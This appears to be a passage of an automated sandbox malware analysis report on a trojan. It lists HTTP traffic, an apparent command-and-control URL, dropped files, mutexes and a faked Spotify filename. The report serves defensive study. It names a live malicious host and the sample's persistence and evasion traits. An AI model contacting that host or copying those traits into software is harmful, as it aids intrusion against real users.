Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:45:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:45:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:45:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:45:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:45:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:45:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:46:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:46:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:46:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: GSwhJpqdkmruXxiphyV.exe, 00000005.00000002.1842059954.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000005.00000002.1842059954.0000000003023000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000000E.00000002.1987860435.0000000003284000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000000E.00000002.1987860435.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000014.00000002.2139072158.00000000037CA000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000014.00000002.2139072158.000000000398A000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000001A.00000002.2282790055.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000001A.00000002.2282790055.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000020.00000002.2402622634.0000000003F44000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000020.00000002.2402622634.0000000003D7F000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000026.00000002.2511025433.000000000304F000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000026.00000002.2511025433.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000002D.00000002.2653710788.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000002D.00000002.2653710788.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000033.00000002.2772444943.000000000373B000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000033.00000002.2772444943.00000000038FF000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000039.00000002.2887348058.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000039.00000002.2887348058.0000000003B86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://228472cm.n9shka.top
Source: GSwhJpqdkmruXxiphyV.exe, 00000039.00000002.2887348058.00000000039C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://228472cm.n9shka.top/
Source: GSwhJpqdkmruXxiphyV.exe, 00000005.00000002.1842059954.0000000003023000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000000E.00000002.1987860435.0000000003284000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000014.00000002.2139072158.00000000037CA000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000001A.00000002.2282790055.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000020.00000002.2402622634.0000000003D7F000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000026.00000002.2511025433.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000002D.00000002.2653710788.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000033.00000002.2772444943.000000000373B000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000039.00000002.2887348058.00000000039C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://228472cm.n9shka.top/PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php
Source: vb8DOBZQ4X.exe, 00000000.00000002.1736281851.0000000003053000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000005.00000002.1842059954.0000000003023000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000000E.00000002.1987860435.0000000003284000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000014.00000002.2139072158.00000000037CA000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000001A.00000002.2282790055.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000020.00000002.2402622634.0000000003D7F000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000026.00000002.2511025433.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 0000002D.00000002.2653710788.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000033.00000002.2772444943.000000000373B000.00000004.00000800.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000039.00000002.2887348058.00000000039C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Code function: 0_2_00007FFD9B8B0D7C	0_2_00007FFD9B8B0D7C
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Code function: 0_2_00007FFD9C028D89	0_2_00007FFD9C028D89
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 5_2_00007FFD9B870D7C	5_2_00007FFD9B870D7C
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 5_2_00007FFD9BFE0C10	5_2_00007FFD9BFE0C10
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 14_2_00007FFD9BAB0D7C	14_2_00007FFD9BAB0D7C
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 20_2_00007FFD9BAE1895	20_2_00007FFD9BAE1895
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 20_2_00007FFD9BAC181B	20_2_00007FFD9BAC181B
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 20_2_00007FFD9BAC02FA	20_2_00007FFD9BAC02FA
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 20_2_00007FFD9BAC02D3	20_2_00007FFD9BAC02D3
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 20_2_00007FFD9BAC01F2	20_2_00007FFD9BAC01F2
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 20_2_00007FFD9BAC0199	20_2_00007FFD9BAC0199
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 20_2_00007FFD9BAB0D7C	20_2_00007FFD9BAB0D7C
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 20_2_00007FFD9BEB5720	20_2_00007FFD9BEB5720
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 20_2_00007FFD9BEB94DF	20_2_00007FFD9BEB94DF
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 20_2_00007FFD9BEC0898	20_2_00007FFD9BEC0898
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 20_2_00007FFD9BEC0858	20_2_00007FFD9BEC0858
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 20_2_00007FFD9BEC0EFA	20_2_00007FFD9BEC0EFA
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 20_2_00007FFD9BEC21C0	20_2_00007FFD9BEC21C0
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 20_2_00007FFD9BE80CFD	20_2_00007FFD9BE80CFD
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 20_2_00007FFD9BE9A020	20_2_00007FFD9BE9A020
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 20_2_00007FFD9C243DEE	20_2_00007FFD9C243DEE
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 20_2_00007FFD9C244B9E	20_2_00007FFD9C244B9E
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 26_2_00007FFD9BAA0D7C	26_2_00007FFD9BAA0D7C
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 32_2_00007FFD9BAE1895	32_2_00007FFD9BAE1895
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 32_2_00007FFD9BAB0D7C	32_2_00007FFD9BAB0D7C
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 32_2_00007FFD9BAC181B	32_2_00007FFD9BAC181B
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 32_2_00007FFD9BAC02FA	32_2_00007FFD9BAC02FA
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 32_2_00007FFD9BAC02D3	32_2_00007FFD9BAC02D3
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 32_2_00007FFD9BAC01F2	32_2_00007FFD9BAC01F2
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 32_2_00007FFD9BAC0199	32_2_00007FFD9BAC0199
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 32_2_00007FFD9BE9A040	32_2_00007FFD9BE9A040
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 32_2_00007FFD9BE80CFD	32_2_00007FFD9BE80CFD
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 32_2_00007FFD9BEB5720	32_2_00007FFD9BEB5720
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 32_2_00007FFD9BEB94DF	32_2_00007FFD9BEB94DF
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 32_2_00007FFD9BEC0898	32_2_00007FFD9BEC0898
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 32_2_00007FFD9BEC0858	32_2_00007FFD9BEC0858
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 32_2_00007FFD9BEC0EFA	32_2_00007FFD9BEC0EFA
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 32_2_00007FFD9C243D76	32_2_00007FFD9C243D76
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 32_2_00007FFD9C244B22	32_2_00007FFD9C244B22

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\AGiVvpLm.log A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779

Source: vb8DOBZQ4X.exe, 00000000.00000000.1682596584.00000000004D0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs vb8DOBZQ4X.exe
Source: vb8DOBZQ4X.exe, 00000000.00000002.1767293355.000000001B898000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe. vs vb8DOBZQ4X.exe
Source: vb8DOBZQ4X.exe, 00000000.00000002.1767293355.000000001B898000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs vb8DOBZQ4X.exe
Source: vb8DOBZQ4X.exe, 00000000.00000002.1767293355.000000001B898000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs vb8DOBZQ4X.exe
Source: vb8DOBZQ4X.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs vb8DOBZQ4X.exe

Source: vb8DOBZQ4X.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: vb8DOBZQ4X.exe, hBFn7RNFV7H302st7w2.cs	Cryptographic APIs: 'CreateDecryptor'
Source: vb8DOBZQ4X.exe, hBFn7RNFV7H302st7w2.cs	Cryptographic APIs: 'CreateDecryptor'
Source: vb8DOBZQ4X.exe, hBFn7RNFV7H302st7w2.cs	Cryptographic APIs: 'CreateDecryptor'
Source: vb8DOBZQ4X.exe, hBFn7RNFV7H302st7w2.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@90/257@1/1

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe

File created: C:\Program Files (x86)\windows sidebar\GSwhJpqdkmruXxiphyV.exe

Jump to behavior

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe

File created: C:\Users\user\Desktop\aCjqmULK.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5724:120:WilError_03
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Mutant created: NULL
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-hQ8SyApqqdscJx2hYL5C
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6340:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6168:120:WilError_03

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe

File created: C:\Users\user\AppData\Local\Temp\4NLGXdFk3d

Jump to behavior

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tzbRZhAhjd.bat"

Source: vb8DOBZQ4X.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: vb8DOBZQ4X.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Windows\System32\chcp.com	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe

